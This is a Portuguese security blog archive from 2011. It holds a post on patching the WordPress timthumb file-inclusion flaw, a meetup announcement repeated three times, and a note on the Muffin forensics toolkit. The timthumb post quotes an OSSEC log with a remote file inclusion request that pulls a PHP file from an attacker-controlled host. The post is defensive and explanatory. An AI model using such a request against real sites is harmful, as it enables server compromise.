WordPress: Corrigindo vulnerabilidade no timthumb

November 11, 2011, by Alexandro Silva - No comments yet

<p><a href="http://blog.alexos.com.br/wp-content/uploads/2011/03/internetera-net-wordpress-eye-wallpaper.jpg"><img class="alignright size-medium wp-image-2310" title="internetera-net-wordpress-eye-wallpaper" src="http://blog.alexos.com.br/wp-content/uploads/2011/03/internetera-net-wordpress-eye-wallpaper-300x225.jpg" height="225" alt="" width="300" /></a>Sugiu uma vulnerabilidade no WordPress classificada como alta, a falha foi encontrada no script timthumb presente na maioria dos templates e permite a inclusão de arquivos maliciosos.</p> <p>O Ossec alerta e bloqueia as tentativas de ataque com o objetivo de explorar está vulnerabilidade se a active-response foi habilitada.</p> <blockquote><p> OSSEC HIDS Notification.<br /> 2011 Nov 11 03:29:38</p> <p>Received From: acme->/var/log/httpd/www.acme.com-access_log<br /> Rule: 31151 fired (level 10) -> &#8220;Mutiple web server 400 error codes from same source ip.&#8221;<br /> Portion of the log(s):</p> <p>xx.xxx.xxx.xxx &#8211; - [11/Nov/2011:04:29:25 -0200] &#8220;GET //wp-content/themes/Quadro/thumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1&#8243; 404 232 &#8220;-&#8221; &#8220;Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4&#8243; </p></blockquote> <p>Para corrigi-la é necessário executar os seguintes passos:</p> <p>1 . Localizar se o arquivo timthumb.php, thumb.php ou similar que encontra-se no diretório template localizado em <em><strong>/wp-content/themes</strong></em>;</p> <p>2. Em caso afirmativo substituir todo o código pela nova versão[1]<br />  <br /> [1] code.google.com/p/timthumb/source/browse/trunk/timthumb.php</p> <p><strong>Maiores informações:</strong></p> <p>blog.ptservidor.pt/seguranca/alerta-de-seguranca-vulnerabilidade-timthumb/<br /> blog.spiderlabs.com/2011/11/wordpress-timthumb-attacks-rising.html<br /> markmaunder.com/2011/08/01/zero-day-vulnerability-in-many-wordpress-themes/</p> <div><h3>See:</h3><ul><li><a href="http://blog.alexos.com.br/?p=2302&amp;#38;lang=pt-br" class="crp_title">Usando o http-wp-plugins do Nmap para detectar plugins do WordPress</a></li><li><a href="http://blog.alexos.com.br/?p=2180&amp;#38;lang=pt-br" class="crp_title">Nessus Viewer</a></li><li><a href="http://blog.alexos.com.br/?p=2770&amp;#38;lang=pt-br" class="crp_title">Conheça o projeto Muffin</a></li><li><a href="http://blog.alexos.com.br/?p=2650&amp;#38;lang=pt-br" class="crp_title">Ossec HIDS &#8211; Bloqueando o ZmEu bot e outros Web scanners</a></li><li><a href="http://blog.alexos.com.br/?p=2555&amp;#38;lang=pt-br" class="crp_title">Eventos Segurança da Informação &#8211; 2o. semestre 2011</a></li></ul></div>


2o. SSASec Day – Encontro SegInfo de Salvador

September 28, 2011, by Alexandro Silva - No comments yet

SSASec
O SSASec é um encontro mensal e informal de profissionais, estudantes, pesquisadores, hackers e interessados em geral por segurança da informação, visando a troca de experiência, networking e como uma forma de nos mantermos atualizados sobre os assuntos ligados a área.

Nós estamos promovendo um mini-evento que ocorrerá dia 12/11 ( sábado ) das 09 às 12 no auditório da Faculdade Rui Barbosa localizada no Rio Vermelho.

Agenda:
Dia: 12/11 ( sábado )
Horário: 09 às 12
Local: Faculdade Rui Barbosa – Rio Vermelho

Palestras
Segurança da Informação – Por onde começar? – Alexandro Silva ( DCLabs )
Segurança de infrastrutura – DNSSec – Ítalo Valcy ( POP/UFBA )
Por trás das pesquisas em Segurança da Informação – Rick ( Corelan ) e AndersonC0d3 ( Hack’n Roll )

Não haverá inscrição, é só ir e se divertir!!


2o. SSASec Day – Encontro SegInfo de Salvador

September 28, 2011, by Alexandro Silva - No comments yet

SSASec
O SSASec é um encontro mensal e informal de profissionais, estudantes, pesquisadores, hackers e interessados em geral por segurança da informação, visando a troca de experiência, networking e como uma forma de nos mantermos atualizados sobre os assuntos ligados a área.

Nós estamos promovendo um mini-evento que ocorrerá dia 12/11 ( sábado ) das 09 às 12 no auditório da Faculdade Rui Barbosa localizada no Rio Vermelho.

Agenda:
Dia: 12/11 ( sábado )
Horário: 09 às 12
Local: Faculdade Rui Barbosa – Rio Vermelho

Palestras
Segurança da Informação – Por onde começar? – Alexandro Silva ( DCLabs )
Segurança de infrastrutura – DNSSec – Ítalo Valcy ( POP/UFBA )
Por trás das pesquisas em Segurança da Informação – Rick ( Corelan ) e AndersonC0d3 ( Hack’n Roll )

Não haverá inscrição, é só ir e se divertir!!


1o. Encontro SegInfo de Salvador – SSASec Day

September 28, 2011, by Alexandro Silva - No comments yet

SSASec
O SSASec é um encontro mensal e informal de profissionais, estudantes, pesquisadores, hackers e interessados em geral por segurança da informação, visando a troca de experiência, networking e como uma forma de nos mantermos atualizados sobre os assuntos ligados a área.

Nós estamos promovendo um mini-evento que ocorrerá dia 12/11 ( sábado ) das 09 às 12 no auditório da Faculdade Rui Barbosa localizada no Rio Vermelho.

Agenda:
Dia: 12/11 ( sábado )
Horário: 09 às 12
Local: Faculdade Rui Barbosa – Rio Vermelho

Palestras
Segurança da Informação – Por onde começar? – Alexandro Silva ( DCLabs )
Segurança de infrastrutura – DNSSec – Ítalo Valcy ( POP/UFBA )
Por trás das pesquisas em Segurança da Informação – Rick ( Corelan ) e AndersonC0d3 ( Hack’n Roll )

Não haverá inscrição, é só ir e se divertir!!


Conheça o projeto Muffin

September 9, 2011, by Alexandro Silva - No comments yet

O Muffin é um dos projetos do grande Tony Rodrigues, ele é um Incident Response Toolkit (Master Unit For Forensics INvestigations) e dá suporte a criação de pendrives com ferramentas que ajuda na coleta de informações voláteis.

Ela está sendo desenvolvida em Pascal com SQLlite usando o Lazarus e é composto por 3 módulos:

O pendrive MUFFIN, que é a toolkit propriamente dita;
O MUFFIN Baker, uma ferramenta que permite configurar e gerar o pendrive MUFFIN;
O MUFFIN Report, que vai acessar os dados gerados/coletados pelo pendrive MUFFIN.

O chamado:

“Estamos precisando de colaboradores. Se você conhece de programação e pode nos ajudar, entre em contato. Se você não conhece, mas ainda assim quer ajudar no projeto, excelente. Há muito trabalho e todos são bem vindos.”

Informações:

http://code.google.com/p/muffin-project/

https://code.google.com/p/muffin-project/source/browse/trunk/SETUP-Desenvolvimento.txt?spec=svn30&r=30

Você que é interessado em análise forense e está disposto a dedicar um pouco do seu tempo convido a participar de um projeto promissor e empolgante com um time super gente fina.

Conheça a @OctaneLabs